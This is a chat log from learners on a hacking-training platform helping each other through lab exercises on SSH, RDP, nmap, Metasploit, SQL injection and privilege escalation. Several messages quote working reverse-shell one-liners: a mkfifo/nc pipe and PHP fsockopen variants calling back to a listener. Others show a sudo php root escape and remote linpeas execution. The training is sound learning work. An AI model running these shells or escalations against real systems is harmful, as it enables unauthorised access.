#modules
Okay i did the thing but it doesn't show me a build number its just blank but it comes up? did i miss a step?
but then, I decided to do it on my own computer and it worked when I did the same commands? so is it safe to say I understood that and can move to the next step or should i keep trying to see why its blank...
what section are you on?
Introduction to Windows, the very first one in the module 🤣 it keeps returning it as blank I am so confused, doing it on my pc it shows my build but not the website it shows blank and not what my workstation should be? have I completely misunderstood 👀
did you successfully RDP into the target?
I dont know 🥺 it doesnt give me an error just a blank build number !!!!
this is what it shows
oh i cannot post a ss lol
but yea ill type it
Version BuildNumber
thats it no numbers nad
Make sure you RDP into the target, I ran the powershell as administrator as well
i have no idea how to do that. I have to go learn how.
replace <targetIp> with your target IP and Password with your password
xfreerdp /v:<targetIp> /u:htb-student /p:Password
the one listed when you spawn the target
for example this was mine
xfreerdp /v:10.129.186.30 /u:htb-student /p:Academy_WinFun!
you need to do that first, connect to the target PC running windows, run powershell from in there, with the commands in the example Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber
Ohhhhhh! I think from what you said I think I see my mistake. I put all the commands together so what I did was this || └──╼ [PS]> xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun! Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber || in one line.
must I break them up do one first then the other?
cause what I did returned the options to give a build number and version but they were blank.
yeah do this first xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun! Get-
xfreerdp /v:10.129.63.228 /u:htb-student /p:Academy_WinFun!
then once you connect to the windows machine open powershell and run the 2nd command
Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber
the xfreerdp command is RDP (remote desktop) connecting you to a windows machine, once connected run the powershell command from the windows machine
okay let me try that.
guys
why is my instance not letting me access ssh? permission denied with password
Hi, i am stuck at Windows services & processes i cant find standard update service running on the host. I try ||Get-WmiObject win32_service | select * | ogv|| , where i filter description, name, status and next i try command ||Get-Service | ? {$_.Name -like "Update"} | fl|| still no service. I too try every running function put to result and still i haven't answer. Can someone give me hint pls?
are you sure that is the correct section you are on? I don't see where you are running those commands in the module?
Oh my gosh I am such a dummy holy hell
tysm! i am a dummy lol i never ever got to the windows machine it kept giving me the error till i said trust it then it showed up and now im in a win 10 machine 🤦
finally 🙏
awesome! good job!
Oh my gosh the second one was easier.
Hey everyone. I think I am also stuck in the same place. I just started htb and am on the windows fundamentals module. How do I connect to a windows machine?
There's a comment just above with the remote desktop command xfreerdp
Yeah, I saw that. I used that in a bash terminal in the workstation and it just gave an error
trust it?
But oof you're smarter than I was lmao 🙏 🤣
like run as root?
yea when it says the error, (y/t/n) just put t and it connects.
oh ive forgotten what I did 🤔
brb
my error is bash: 10.129.211.15: No such file or directory
Hmm. what are you typing?
xfreerdp /v:<10.129.211.15> /u:htb-student /p:Academy_WinFun!
That the IP and password that got generated for me
Yay! 💞
That's a little bugger that the prompt had those in there and its not obvious to remove them.
Thank you so much!
Haha! ^^ and np 👍 glad I was able to.
Which option needs to be set to create a home directory for a new user using "useradd" command?
does anyone understand this one?
I have tried everything, but won't work
User Management on Linux Fundamentals
I have tried, useradd -d -m su, useradd -m su, --create-home
etc
anyone can help me?
Hey, I'm sorry I cant help. I just got started and don't know where you are at or how to help. Someone will be along soon who can help
I'm stuck in Public exploits, I'm trying:
||auxiliary(scanner/http/wp_simple_backup_file_read)||
I don't know how I'm supposed to find the path to flags though
You must just put in the option. Don’t put in the command together as it says “which option “
GETTING STARTED
Page 9
Public Exploits
im stuck there too
search exploit <type exploit here> does not work
search <type exploit here>
that works in msfconsole
however, i cant find wordpress in searchsploit
but i see wordpress in my nmap scan
i also tried searching for wordpress and the version number in rapid7 but it returns 0 results
i followed everything from the section
i also tried an ssh exploit that i managed to search for successfully in msf only because i did an nmap scan using the vulners script which was not mentioned in the section. however, when i follow the directions in the section, the exploit runs successfully but does not give me a shell.
i even tried connecting to the ip and vulnerable port using netcat but i still dont get a shell
Hey, so the hint should say use searchsploit to look for "plugin" exploits. I successfully found an exploit within MSF to read the flag.txt file from the service running on the target. PM me if you have any questions.
can anybody help me? module about sql injection
Anyone available to assist me with privilege escalation send me a pm... I’m all sorts of stuck
im still stuck on this
GETTING STARTED
Page 9
Public Exploits
people tried to help in a pm but they dont make any sense
im trying to get the wordpress version from a service scan on the target port but if i browse to the target port and ip it says wordpress is a different version
there has to be a way to get the proper version from nmap
and i guess its not possible to get the plugin exploit from searchsploit like the section suggests because no one has successfully done it that way
2 people have now told me to use rapid7. even wpscan shows a different version than what is shown in the browser
Hey, I'm currently working on the linux fundamentals course, the Service and Process Management section asks me to use systemctl to submit the unit with the "Load AppArmor profile" description. I ran " $systemctl list-units --type=service " no luck finding a unit with the description. I'm not sure what to do at this point, there's so much info in man systemctl I'm not sure where to start.
I think you should use the grep command to find the file more easily
Just add the grep command behind the command you used
Hi
it's Windows fundamental module #4 question
I have a problem with the "Getting Started" Page 9 "Public Exploits" flag.
You are supposed to exploit a plugin. Since the website is filled with all the "simple backup" plugin stuff I was thinking about this one and searched for an exploit. This returned the exploits: “wp_db_backup_rce” and “wp_simple_backup_file_read”
Unfortunately I can’t get either to work since for the rce one I need a username and password which I’m unable to find and the “wp_simple_backup_file_read” won’t do anything but give back:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Since I have to extract the flag.txt I feel like the “wp_simple_backup_file_read” is the right one but I can’t get it to work.
Could you give me any hints?
im stuck on that module and section too. ive been told how to solve it but it does not relate to what is taught in the section. i would like to know how to properly do the nmap scan and properly find the exploit in searchsploit as suggested in the section.
because the nmap scan i have done is returning with the wrong wordpress version
Try browsing to that ip for finding the plugin
thats what i was told to do was to use the browser, but thats not a real world scenario
it doesnt help me learn how to properly find an exploit and use it in metasploit
I mean the page tells you about the simple backup plugin stuff so I was thinking about exploiting this. Is this even the correct way?
I searched for exploits for that plugin
but browsing a webpage doesnt normally tell you what version a plugin is using
And then I'm stuck on this knowledge check section for three days that I do not properly recall how I found the flag..
This one does..it's on the page title
i know but i mean thats not a real world scenario. i thought the academy is supposed to teach us the proper way
which would be with an nmap version scan first
or wpscan
Yes and it gives you like 4 but 2 of them I don't see any use case in this one. The two others are named “wp_db_backup_rce” and “wp_simple_backup_file_read”
i was told you need to compare that to the plugin version for the correct one
or it at least limits it to 2 exploits or something
then you read about what each exploit does
@frigid viper @atomic light Yeah this is the correct path.. the plugin has file read vulnerability.. use the proper tool for searching exploits and make sure to set the options correct.. you will get to read the flag...
I tried doing it again... As I had forgotten how I did it earlier
Yes I used the wp_simple_backup_file_read with the ip set but it just returns
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Yes.. check all the options
which option do i have to tweak in order to get it working?
Ok, wait a sec I'll try it again
how do you know what directory the flag is on if we cant open a shell?
i was thinking about it just being /flag.txt but im not sure on this one. I cant figure out which second option i should set, maybe vhost or depth?
i set FILEPATH and RHOSTS
filepath i set to /flag.txt
it didnt work when i run metasploit
It could also be the /simple-backup/flag.txt since the text on the plugin states, that the backups will be saved in the simple-backup directory
where did you find that path?
went to the webpage there it stated, that it will save it in the simple-backup in root (screwed up on the wp-admin thing sry) so it should be /simple-backup/flag.txt ?
didnt work with that path either. maybe it needs to be the full path
i also tried LHOST tun0 didnt work
and i tried LHOST my host ip
didnt work either
i get the same thing as you
RPORT in the exploit is set to 80...(by default...).. it's different in the question
oh but the section says to change options that arent set
what a red herring. ill try that
omg i got it. Thank you so much man
👍👍.
got it too
Were you able to find root.txt?
Module: Getting Started
Section: knowledge check
Managed to run a getsimple metasploit to gain access to the first flag. However, the Meterpreter pseudo-shell supports limited commands like cd, ls and cat. How should I get a LinEnum.sh/LinPEAS.sh script on the target and escalate privileges?
I tried the shell_to_meterpreter exploit too... But I can't use any other command, other than ls, cd or cat.
Can someone nudge me on the skills assessment for SQLmap Essentials? I don't find the vulnerable link, nobody is answering in the easy-modules channel
Thank you very much, worked perfect! 🙂
Hi guys i need help at Local File Inclusion... I have found some Credentials to log in to mysql but i can't connect to the host no matter what i try. Can somebody help me pls?
Hi friends, I'm still in the Linux fundamentals, in section Working with Web Services. The first part asks me to install apache2. However the instance on the website won't let me run the apt install command as root. I get a message saying "htb-student is not in the sudoers file. this incident will be reported."
Is there a way to get around this? Because I can't do the next exercises without apache2 installed
MODULE: SQL Injection Fundamentals
SECTION: Union Injection
QUESTION: Use a Union injection to get the result of 'user()'
I don't understand what the question is asking
Get the result of user() with union injection
what does user() mean?
ok
i stuck
@hearty saffron try to follow as the module explain try to execute user()instead what was used in the example
Can anyone give me a nudge on privilege escalation module in ‘getting started’? I’m stuck trying to ssh to root
it says unknown variable user
can you get socat on there? socat might get you a full tty shell. i used it on the linux privilege escalation module. then i escalated to root privileges with a gtfo bin.
im not on the knowledge section yet though. i just woke up.
can tell me what page so I could look ?
section is called Union Injection
module is SQL INJECTION FUNDAMENTALS
@mint lava
try to do as the module says on the ssh keys
dm me
Hi i am hard stuck on web requests. To be more precise on the Post Method on the Question where i have to use POST and GET requests with Burp to get to the admin user. I have a Target and the credentials (guest:guest). I know that the site uses a Cookie to identify me as guest and i can use base64 to decode it. And when i edit it and send that as my set cookie the site shows me that the cookie was edited because the decoded cookie is shown on the response html code. But nothing of that response helps me to get the points for the question so i must do something wrong and i dont know what.
try to change the guest cookie to something else
why only the guest part
the number after guest_ is to identify the different guests
So i have no information about what a correct number after that is. I thought that i can promote myself with that
try without number
I’ll dm you
Can someone nudge me on the skills assessment for SQLmap Essentials? I don't find the vulnerable link, nobody is answering in the easy-modules channel
What non-standard application is running under the current user ? (The answer is case sensitive).
stuck at this question of windows fundamentals, tried so many apps
Open task manager and check what application doesn't come installed in windows by default
When you open the task manager, there should be details that might be helpful
sure
Does someone else have a problem with Getting started module-Knowledge Check it seems that the target is down
I tried to re-spawn the target several times
Have you tried to refresh the page, and then re-spawn the target machine?
yes I did
as you can see, I re spawn 3 targets
Does anyone else have that problem?
Is there any staff member available that can check that issue?
I don't know if I'm just missing something wildly obvious, but could I get some help/clarification on what the GET Method question of the Web Requests module wants me to do? I'm not sure how to go about getting what it's asking for
give me a few
Thank you
What is the question maybe I could help
I need to send a GET Request to flag.php with two parameters num1 and num2 such that their sum is 1337
do you understand what you need to do?
Not really if I'm being 100% honest
DM me
What did you use with nmap to get a result? I found it was wordpress via the web browser but couldnt seem to get anything back from NMAP?
i was able to get the wordpress service and wordpress version from nmap but i couldnt get the plugin and plugin version from nmap. ill pm you.
@drifting knoll got anything?
we're working on it, can take a bit
The Nibbles machine won't work for me either with several respawns on the target! I was about to ask about this and saw that it is being worked on 🙂
File Inclusion / Directory Traversal
--- skills assessment ---
I have literally tried everything that the module says, but with no success.
||I was even able to read the source code for that “invalid input detected” text.||
But I’m not getting any further. Could anybody here give me a hint about it ?
--- PLEASE ---
what module is that one?
The module is "File Inclusion / Directory Traversal"
Sorry I have not done that one yet...
I'm stuck on Public Exploits on the Getting Started Module.... I think I'm going to work on the intro to web apps for a bit to clear my head.
No.. like I found the vulnerabilities but couldn't get a reverse shell using netcat/socat.. (used metasploit).. then I found the user flag.. but I just can't figure out how to get the root access..
I will be leaving this module for now.. will try completing others and maybe solve a couple of machines and then come back to this question.. because it is taking a lot of time.
If I figure it out I'll let you know. I'm not at that section yet. I've been taking lots of breaks. I usually knock off like 1 or 2 sections when I wake up in the mornings. I'm in bed right now and looking forward to tackling it when I wake up.
Sure buddy👍.
for the life of me I can't remember how to rdp
I'm sorry I should have been more clear....i need to rdp into a target using the command shell from parrot
have you tried xfreerdp / rdesktop / remmina? I haven't done this module - I am just providing some assistance.
remmina
I think xfreerdp was the one I was trying to remember
thank you
Any tips/nudges for the priv esc section of the getting started module?
hello
hi!
what have you tried so far?
which box do you make?
Hello
I'm replying to PapaShango, he is trying "privilege escalation" section of "getting started" module
@slow salmon I’ve looked for misconfigured files with Suid, cron jobs and public exploit for vulnerable kernel versions
pm me
@patent blaze try to use PHP wrapper to view the source code
Hello all!! Bit of a noob here and been stuck on this for the past couple of days: Linux Fundamentals; Working with Web Services; Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). Have tried numerous commands... any pointers? Thanks.
👆 I have the same question as AnneBonny. I've tried all sorts of commands and nothing I have tried is being accepted for the answer.
I have been to both the websites below (and many more besides) and have tried variations on these commands. Am I missing something fundamental? Thanks.
Hey all
in the SQL Injection Fundamentals module i have a problem connecting to the remote mysql databse i keep getting this error am i doing something wrong ?
sudo mysql -uroot -h206.189.121.131 -P32193 -p
ERROR 2003 (HY000): Can't connect to MySQL server on '206.189.121.131' (111)
@latent crest If I'm not wrong you have to put a space after "u", "h" and "P" parameters
tried it that way as well sadly nothing
GETTING STARTED
Page 11
Privilege Escalation
im trying to download linpeas from my simplehttpserver to the target but it wont connect
ive done wget <my_ip>:8000/linpeas.sh on the target
Just finished this module. Search how to use your current shell
but im not trying to escalate privileges yet. i just want to enumerate with linpeas
wget shows its trying to connect but it keeps failing and retries over and over
Have you set up your listener in the right directory?
i started the listener in ~/
the same directory as linpeas
i even tried restarting the instance and target
hello please can anyone help me with system information questions in Linux fundamental module
i tried a lot of answers that didn't work
hey! Can anyone help me with this... i am googling from last 30 mins 🥴 
Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).
What question are you stuck on, I could help
GETTING STARTED
Page 11
Privilege Escalation
my reverse tcp also isnt connecting back to me. it times out
@left flicker @obtuse igloo You need to assume that npm is installed on your machine. Try to google man npm
HTB Getting Started module, Knowledge check. I'm stuck with p23 root-flag. I've run my LinEnum.sh and uploaded a webshell so that I can e.g. browse files as www-data, but just can't figure out how to break out as root.
Thanks! Having a google now 😉
Source code of what ? Because I did see the source code of that error message
@patent blaze Did you manage to view the source code?
you know that error message “invalid input detected” ?
i did saw the source code of if
of it**
Hi everybody!! I been stuck in last part of module "Getting Started". Please, anybody can help me? Thanks in advance! 🙂
gonna dm you
Can anyone tell me why my netcat command doesnt work? ... it looks like the example, but no luck ...
Try nc or ncat
no luck 😦
to me, it looks like netcat is working, simply the target address is not outputting any banner
press return a few times see if it comes back with something
or use the -nv options
yeah, use the -v option to see if the connection is actually happening
hmmm interesting... I have re-spawned a few times with same result .
And it eventually returns
]$ netcat 188.166.168.204 22
^[[28~(UNKNOWN) [188.166.168.204] 22 (ssh) : Connection timed out
-v didn't help unfortunately
Thanks for the suggestions, I've no idea what im doing with it lol ... off to Google I go 😆
try to search PHP wrappers to view source code, You can DM me if you want
I was able to run linpeas via SSH on the target. I haven't figured out how to get root access to read flag.txt yet but linpeas did work
How did you download linpeas to the target?
I can't get anything to connect to the target, only ssh
Wget doesn't work
i didn't I ran linpeas over SSH tunnel.
let me know if that works, not sure youll have access without gaining root first.
If it's like linenum it doesn't need root
this is what i ran ||ssh user1@188.166.168.204 -p32495 'bash -s' < ./linpeas.sh|| this was from within the directory that has linpeas in it
Hey I am stuck on the last box in the Getting Started module. I was able to get a meterpreter shell on the box but I can't use any commands on the machine to be able to set up a reverse shell. I can use commands like ls,cat,cp,mv but I cant use any of the binaries in /bin and I cant figure out how create a executable so I can set up a reverse shell.
i managed to upload linpeas to the target through ssh and did chmod to the file while on the target
i was then able to run linpeas and get a password but it is not working for user2 sudo password
im not sure what to do with this password
Any help with skills assessment File Inclusion / Directory Traversal
sounds like maybe were at the same spot? I got the first flag but can't figure how to traverse to sudo to read the 2nd flag or chmod
i still havent gotten the first flag
@rustic sage i am having the same issue
i found the flag but cant read it
I do nc/netcat on the target and it just freezes
yeah nc doesnt connect and times out
also wget doesnt connect and times out
but i can upload files through ssh
so maybe i need to do nc or socat on the ssh port?
Do you see the directory user2 has access to?
any clue on that part? I wasnt able to retrieve a password...
yeah user2
hint ||/bin/bash||
in linpeas find the line that says file needs this password:
i thought that was for the gtfo bin for user2 which i dont have access to?
i also cant get a full tty shell because i cant get netcat to connect
i need a full tty shell for the gtfo bin to work
you can get that first flag with just ssh
im on ssh but its only ssh for user1
i'm doing the linux fundamentals module; i can ping the machine that's started but cannot ssh into it... halp?
you have username@ip address?
yes for user1 only
want another hint?
yeah; it's provided in the module htb-student@<ip>
but it just hangs and eventually times out
make sure to remove the <>
nah that was for you, ||sudo -u||
sorry I'm confusing... the <> was for blackmartian
i put the actual ip there, lol
are you using it like this? ssh user@10.10.10.10 -p 445
-p =port
🤦 non-standard port
right, just change it to what you need
to be fair, i started the lesson a while ago and came back to finish it; i mustve forgotten it wasn't on 22
why is it that when I use "ssh root@ip -i id_rsa" I get connection timed out?
... or is it? looking through the module, no other port seems to be used 🙁
can someone hint me ?
turned out VPN running on host machine was the culprit; paused it and i can ssh in 🤷
Anyone done the offensive getting started? I have a question
nvm im an idiot i figured it out
Hi there everyone!
I just started using HTB Academy, I'd like to make some friends here.
Feel free to say hi😁
Hi
Which module are you currently working on?
File inclusion
I'm doing the Linux fundamentals module now
sure you can dm me for the advice
Arigatou senpai🥲
Arigatou😆
Welcome to the team Rudhraa!
We're all in the same boat. Feel free to ask for help 😉
👍
sure thing bro
the funny thing is, I started looking into cyber security after watching Mr. Robot
Originally i have programming background
But this is hella fun bro
Btw guys, I've been stuck on the wrap up exercise of Getting started. Is there anyone I could ask some questions about php? About parsing and reverse shells
Hahaha that series is a trip
Php? What is it about?
Like it seems like loading a bash command with redirection in it breaks the script, since the > sign seems to close the php command. At least this is my interpretation. I'm looking for a way to overcome that
I'm trying to load the classic 'system("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc [ip addr] [port] > /tmp/f")'
I'd love to help you if i know how too... sorry bro. Bet others in this group can help you.
No worries bro. Appreciated 💪 💪 💪 💪
I managed to solve it!!!!
😭 😭 😭 😭 😭 😭 😭
Tears of joy!!!!
Hahaha I actually only overcame that issue. Gotta continue the challenge though hahaha
ayesha
the last five 🤓 😢 😫
Hello everyone!
I'm having trouble understanding how to run the payload: www-data@gettingstarted:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
English only pls, so others can understand what you want too
i want run this code: php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);/bin/sh -i <&3 >&3 2>&3;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
why don't you try something simpler first?
What does this entry mean? User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/var/www/html$
do some research about sudoers file
Because I have to pass the last test at the Academy.
i know but it isn't necessary to obtain a reverse shell, is it?
how else to increase privileges?
what does your code do?
using what?
can someone help me get htb-student's mail? Module : Linux Fundamentals
check your environment
sorry for noob question
can you elaborate?
read the section carefully and you will see how to do so
I can't I am stuck it's been 20 mins

read it again
can you give hint?
already did
The idea is this: I have a user. I know that I can run php command without a password on behalf of any user. and I want to call as root reverse _shell on terminal. thus get root rights. found the command at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#php
thats a good approach but why would you want to run a complex code that has great error potential instead of a simple command that gives you the answer you need?
command to do what?
depends on what you want
what does the exercise want?
Hello im new to htb and im trying out a module in the academy but im stuck at this question:
"Perform an Nmap scan of the target. What service is running on port 8080? (two words)"
The command + the output is:
```
nmap -Pn -p8080 10.129.227.149
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 11:18 UTC
Nmap scan report for 10.129.227.149
Host is up (0.010s latency).
PORT     STATE SERVICE
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
```
And should the anwser be "http-proxy" then?
it won't accept
/var/mail
check Nmap man page
I ran linpeas.sh and saw these problems in my system setup. escalation priv
@drifting knoll sorry for ping btw
it doesn't answer my question
you didn't check your environment
i did and thats how the commands should look like
this is what I got MAIL=/var/mail/htb-student
what is the question asking you for?
Hello. try the same thing but through Start Instance (Pwn)
root flag.txt 😆
so you actually just need to read it, don't you?
@drifting knoll
@rustic sage stop pinging
There was the same problem. shows one text through his terminal, and another text through pwn in the browser
what does the question ask you for?
What the name of the service is because i thought that its http-proxy
yes
done ty 
you mean like the instance in the browser that can be created?
so why do you want to run a reverse shell?
which options of Nmap you can use?
The hint seems clear, but there are no known ways to read the file as root. except for the method of obtaining first administrator rights and then reading the same file.
there are a lot of ways to execute shell commands using php
In any case, it will probably ask for a password of rights.
or not?
try it out
is there a link to a resource? or does google help us?😆 👍
i did but the output is the same
@quaint marsh try to look at https://gtfobins.github.io/gtfobins/php/#sudo, I used it to obtain root without running another nc session as root
👍 thk
@quaint marsh feel free to dm if you want
In the linux fundamentals module, do you have to spawn the target to be able to do the questions ?
Where do I have to put that ?
in your Pwnbox instance, run the following command:
ssh htb-student@<target-ip>
Thanks
Thank. helped!😀
CMD="/bin/sh"
sudo php -r "system('$CMD');"
By the way I'm new here too. Just started using discord today
Hope to make friends with all you guys😁
pls be careful with spoilers
Guys, what other ways can you use to arrive with an answer for this question "Which shell is specified for the htb-student user?". I used "echo $SHELL". Thanks in advance
Noted, I'll just give a hint next time
PORT STATE SERVICE VERSION
32369/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
We have a Plugin Simple Backup 2.7.10 for WordPress. He has a vulnerability: The Simple-Backup Wordpress Plugin Was Affected by An Arbitrary File Download Security Vulnerability.
Question: Where to read about the introduction of code in HTTP to receive a file (flag.txt)?
There is no accurate description about vulnerability. where to look? says about ../../
CWE 22
Hey all could someone plz help me out?
I'm on Getting Started - Privilege Escalation
I loaded linPEAS on the target using ssh got a whole bunch of info
but im too much of an ape to understand what to do next ...
im in the target as user1 and i need to escalate to user2.
I'm too dumb to figure understand what I need to do next...
plz halp!
Public exploits passed?
you mean, look for public exploits for programs on the box?
k, i'll try that
Hey all I'm on Getting Started - Public Exploits and am stuck on something, could I msg someone with a question?
It is still interesting here, whether you need to access User 2 first (because it has the ability to run with root privileges) or immediately look for ROOT rights?
vector sudo 1.8.31 -> patched not vuln.
yeah its running sudo 1.8.31 so its patched
yo!
I've got a simple question that is stumping me would anyone possibly be willing to help?
I'm stuck on Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)
i don't know too!😆
I looked up sudo and tried some of those commands but nothing seems to be working
I try su and this doesn't pull anything up 🤔
Has anyone walked this path?
sshd: process found (dump creds from memory as root)
off to the market for now! I'll jump back in later to see if I can get this figured out!
So excited that I got to hack my first box last night! Small potatoes for most but it was super exciting for me!
damn guys, i am ending the "get started" module but the site you could follow with the IP is slow as hell and i can't continue with the admin page. Did you have the same problem with the last knowledge check point ?
how can i enter the /admin/ page with the terminal using the username and password i found ?
same here, the website is extremely slow
is it possible to switch targets? cuz i have no idea if im connected to the target i need to
says my target is htb student and when i type whoami it says another user
Read through the directions then and double check you have done what you need in order to get to where you need to be.
Ill try my best then TY
I figured it out
you need to pull up a list of su command options
Anyone help me with the web requests - the hint says manipulate the cookie.. I've tried re-encoding with the admin_xxxxx rather than guest_xxx but this only seems to change the banner. I'm not getting a PHPSession ID either...
not quite there yet 
.-. i just needed to do SSH username@target lmao
and i forgot
Hello. I'm completely new to cyber security, and I'm attempting to take the fundamentals course. I'm trying to access the target SMB share folder to access a file. I'm completely at a loss here. Any tips to get me going in the right direction?
hey crazyhorse, im stuck in Getting Started Privilege Escalation ... i cant figure out how to get user2. could u give me a hint plzzz? i sshed in and ran linPEAS over an ssh tunnel but im too dumb to figure out what to do next...
check your port. What is the port of the target?
love that screenname
Is anybody able to help? I'm completely stuck

thanks
You're further along than I am
@odd tree ahh shame :/
It's weird how it's a fundamentals module and I get stuck right in the beginning, makes you feel so dumb xd
I mean I came here cause I was stuck on something you're well beyond. We're all just learning to walk right now so the pace really does seem like a crawl to me 
But we will get there 
I literally took the fundamental module, what more basic is there?
is there something i should do prior to this?
I'm on the "Getting started" fundamental module. Is there somewhere else i should start?
I'm at the end of the module atm. and until the "Knowledge Check" you really just have to repeat the things shown and add a little spice 
With the SMB txt file i tried all the commands
think about the code you learn in that session ||sudo -l|| and what you can do with that knowledge. At that point you should get user2 pretty easily
but nothing seems to work
What lesson is it?
Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.
Service scanning
i think
i can't physically connect to the admin page because the site is too slow.
Do you know how to use "gobuster" using the username and password to visit the site ?
Nah, ill try tomorrow and hit u up if i got something 😄
@elfin bridge try to run http-enum script on the target. then look at the results and continue from there
Tried is with the target port, same issue
WOOT! good job on figuring it out
i have already done that but except learning the username and the password, the site is too slow to navigate on admin pages
@elfin bridge did you find other directories? try to find any information about the version of our target and search for exploit that you can use
ok perfect 👌 i'll try that
env command
--command
--command
Hey, I'm stuck in the Getting Started Module on Privilege Escalation. I was able to get to user2 but could not get to root no matter what i tried. I would be thankful for a hint on where to look.
hello, in the web requests module post method section i successfully manipulated the cookie. I got the admin panel, but the flag is incorrect. Anyone can help me?
ssh
Ok, thanks. I'll look more closely at this
hi all, i just finished the linux fundamentals. i had a little trouble with the curl https://www.inlanefreight.com question. i did get it but i was wondering if someone could DM me so i could ask about a better way to solve it without giving spoilers in the room. I got to the point where i used grep but still got four extra URLs. Using sort, I could easily identify the four i did not need. I'm looking for a cleaner way to get the result. I think I need to be more specific in grep but I have man paged and google-fu'd my best.
i feel really dumb right now, but how do i get the banner of the server in Getting Started: Basic tools? when I do ssh user@ip.address it says that it can't resolve hostname?
@amber shuttle do you have to start the instance for the user you want to ssh at the bottom of the page before the questions?
uh
i started the instance
I also did not understand for a long time because of an inaccurate question. ||num1&num2=1337||
@amber shuttle so, i just started this one to see what you meant. they don't give you a user. all you have is the ip:port does that help tell you what to do?
I wonder how you found this particular plugin, ||but you're right||! better look at what it says! he saved the answer to a file !!!
@amber shuttle i have to get going but if you run into more trouble, when I did this just now it wouldn't load, so i ran the command from my native machine's terminal and it worked.
hello I am new to htb and I think I'm in the right area to ask for help. im currently stuck at system information on Linux fundamentals. I think im connecting correctly and attempting to enter the password but it keeps saying permission denied, any idea on what im doing wrong?
nvm I had it backwards woops
Hi, Im having some trouble with the package management part of the linux fundamentals module. I made a folder and cloned evil-winrm into it but in the files that got downloaded I'm not really seeing anything that looks like a package I could point apt at to install
wait I think I was using the wrong github link there... give me a minute...
Hi guys im currently working on FILE INCLUSION / DIRECTORY TRAVERSAL, and im stuck on first question about this
" Submit the contents of the flag.txt file located in the /usr/share/flags directory."
i tried every method but nothing works im getting this error message on the target website
"Warning: include(expect://id/usr/share/flags): failed to open stream: No such file or directory in /var/www/html/basic/index.php on line 47"
"Warning: include(): Failed opening 'expect://id/usr/share/flags' for inclusion (include_path='.:/usr/share/php') in /var/www/html/basic/index.php on line 47"
nope, still only seeing md and png files being installed, back to square 0
Why is it that for the website of Knowledge Check I can login as admin, but when I use the same credentials for metasploit it fails?
https://academy.hackthebox.eu/module/18 <-- This is the Linux Fundamentals Module, I'm on the "Find Files and Directories" one. There is this question, "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?", I know for a fact that I'm typing the right command and I even used the '2>/dev/null' option with it, yet still the files I find don't seem to be the answer. Any help here please?
@graceful prism can you share the command you're using?
@scenic apex try to use PHP wrapper to view the source code
thanks @mint lava but im stuck on that question can you give example
oh im sorry i will re type it
google how to use PHP wrapper to view the source code
thanks
if you still need help feel free to DM me
sure thanks!
nah mate, I was able to get it done with another member's help, thanks for stretching the helping hand tho!
Hey there, I'm a little stuck on the Linux Fundamentals: Filter Contents final question
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
I'm using this curl command combined with some sorting options ||curl https://www.inlanefreight.com/ | grep "https://www.inlanefreight.com/" | sort --unique | wc -l|| and getting a result of ||48||. But that isn't the right answer, any pointers?
Solved! Thanks @neon shard.
@rustic sage @graceful prism After speaking to you both, I think for both of you the takeaway is: Check your output! You never know if your initial command outputs a little extra or less than you expect. Counted lines don't match the answer? Check the lines that you counted and see if there's something in there that you didn't expect!
Haha yup, thanks man!
for sure mate! Thanks
Hi guys, I'm stuck on prolly something very simple.. I just started the fundamental training for linux and the first thing it asks me to do is SSH to an ip with a login ..
however when i type ssh 'ip' in BASH its not connecting
what am I doing wrong?
it takes a while to respond but after a while it tells me connection timeout
hey there I have the same issue
i am at the workflow navigation part and after I spawned the target while trying to ssh, i get no option to input password
ssh: connect to host 10.129.72.xx port 22: Connection timed out
If i want to create my own VM and do these tasks from there, do i need to buy a VPN service?
ssh username@ipadress
i know that. I did do that. ssh htb-student@ip
but it doesn't do anything and after a while I get timeout.
Why would you need a VPN service to use a VM? You would spin up a vm....and use HTBs VPN to connect to THEIR network.
I'm 100% new to cyber so consider me cognitively limited in this subject area
i have no idea what i'm talking about
Have you done the "Getting Started" module? I'd recommend that and other Introductory modules.
I'm doing it yeah but the subjects go a bit over my head still. IT is a foreign field to me and I'm not a native speaker either so doesn't help
I don't understand much about networks or computers beyond the basics
There is a Networking module as well that will help with this.
It says "HTB and other services offering purposefully vulnerable VMs/networks require players to connect to the target network via a VPN to access the private lab network." So i thought i need a VPN
